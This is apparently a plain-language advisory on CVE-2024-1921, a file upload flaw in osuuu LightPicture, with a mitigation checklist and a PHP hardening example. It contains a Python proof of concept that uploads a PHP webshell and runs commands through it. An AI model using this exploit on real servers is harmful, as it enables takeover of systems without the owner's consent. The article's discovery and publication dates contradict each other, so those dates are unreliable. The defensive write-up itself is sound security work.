On March 26, 2024, a critical vulnerability identified as CVE-2024-1921 (also tracked as VDB-254856) was discovered in the *osuuu LightPicture* image management software, affecting versions up to 1.2.2. The security issue lies in the /app/controller/Setup.php file, where improper file validation allows an attacker to upload arbitrary files—including malicious PHP scripts. This can result in remote code execution (RCE), completely compromising the vulnerable server.

In this article, we’ll break down how CVE-2024-1921 works, provide a simple PoC exploit example, and discuss how to protect your systems. We will also share links to original references for community and developer response.

What Is osuuu LightPicture?

osuuu LightPicture is an open-source, lightweight image management and gallery tool, often deployed on personal and small business web servers. It offers ease of use and quick deployment, which makes it popular—but also attractive to attackers seeking vulnerabilities.

What Went Wrong? (The Vulnerability Details)

In versions up to 1.2.2, LightPicture’s Setup.php controller does not properly validate or restrict files uploaded during initial setup or image placement actions. This means a user can upload *any* file type, including server-executable scripts like .php. This is referred to as an "unrestricted file upload" vulnerability.

See the National Vulnerability Database (NVD) entry and the VulDB entry for the bug, both linked under Original References below.

Exploit Scenario

A remote attacker can craft a POST request that uploads a PHP webshell disguised as a harmless image. The webshell is placed in a web-accessible folder, and once uploaded, the attacker can execute arbitrary commands on the web server.

Exploit in Simple Steps

- Send an HTTP POST request to /app/controller/Setup.php with a malicious file.

Example Code Snippet: Exploit Proof of Concept

Below is a Python 3 script demonstrating how attackers can leverage this vulnerability.

import requests

# Replace these with the actual target details
target = "http://victim.com"  # placeholder hostname, not a real target
upload_url = f"{target}/app/controller/Setup.php"

# Malicious PHP webshell disguised as image
webshell = {
    'file': ('shell.php', '<?php echo shell_exec($_GET["cmd"]); ?>', 'application/x-php')
}

# Send the upload request (attacker's exploit)
response = requests.post(upload_url, files=webshell)

if response.status_code == 200:
    print("[+] Shell uploaded!")
    # Assume shell is accessible at a known location, e.g. /uploads/shell.php
    shell_url = f"{target}/uploads/shell.php?cmd=whoami"
    exec_response = requests.get(shell_url)
    print("[+] Command output:")
    print(exec_response.text)
else:
    print("[-] Upload failed.")

Note: This example assumes the file is placed in an uploads/ folder. Real paths may differ per LightPicture deployment.

Original References

- NVD entry for CVE-2024-1921
- VulDB advisory VDB-254856
- osuuu LightPicture GitHub repository

If you use osuuu LightPicture versions up to 1.2.2, you are at risk! Here’s what you should do:

- Update Immediately: If a patched version is available from the GitHub repo, upgrade ASAP.
- Restrict File Types: Patch your own code to limit uploads to image file types and verify MIME types server-side.
- Validate User Access: Make sure file upload features require authentication.
- Check File Permissions: Uploaded files should be saved outside web-accessible folders, or execute permission should be blocked.
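Here is an added PHP example (written for this article, not LightPicture's own Setup.php) of what the four items above look like in one upload handler: an extension allowlist, a server-side MIME check on the real bytes, a decode check, an authentication gate, and storage under a random name outside the web root. The STORAGE_DIR path, the `file` form field and the `$_SESSION['user_id']` check are assumptions about the deployment.

```php
<?php
// Added hardening example, not LightPicture's own code: validate an uploaded
// image and store it outside the web root under a server-chosen name.
declare(strict_types=1);

const STORAGE_DIR = '/var/lib/lightpicture-uploads'; // assumed; outside DocumentRoot
const MAX_BYTES   = 5 * 1024 * 1024;
// Allowlist of extensions and the real MIME type each must sniff as.
const ALLOWED = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                 'png' => 'image/png', 'gif' => 'image/gif'];

// $file is one entry of $_FILES. Returns the stored path or throws.
function storeImageUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name']) || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('upload rejected: error, not an upload, or too large');
    }
    // 1. Extension allowlist; the client-supplied Content-Type is never consulted.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // 2. Server-side MIME sniff of the actual bytes must match the extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException("content is $mime, expected " . ALLOWED[$ext]);
    }
    // 3. The file must decode as an image; a PHP script with a forged header will not.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a decodable image');
    }
    // 4. Drop the client's filename; random name, outside the web root, no exec bit.
    $dest = STORAGE_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);
    return $dest;
}

// Handler (session-based auth check assumed): reject anonymous uploads up front.
if (empty($_SESSION['user_id'])) { http_response_code(401); exit; }
try {
    echo json_encode(['ok' => true, 'id' => basename(storeImageUpload($_FILES['file'] ?? []))]);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo json_encode(['ok' => false, 'error' => $e->getMessage()]);
}
```

Checks 1 to 3 stop a bare .php upload, but a valid image with script appended still passes them, which is why step 4 (no client-chosen name, nothing stored where the web server would execute it) is the control that actually removes the RCE path.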

Conclusion

CVE-2024-1921 in osuuu LightPicture is a serious security hole, allowing attackers to upload any file to the server, potentially gaining full control remotely. This type of vulnerability is a common entry point for web-based attacks.

If you run LightPicture (or any PHP upload system), act now—patch the code, restrict file uploads, and stay alert for suspicious activity.

Stay safe, patch early!

*This post is an exclusive, plain-language summary for users seeking clear understanding and immediate steps for CVE-2024-1921. For further reading, check the links above.*

Timeline

Published on: 02/27/2024 15:15:07 UTC
Last modified on: 02/29/2024 01:43:56 UTC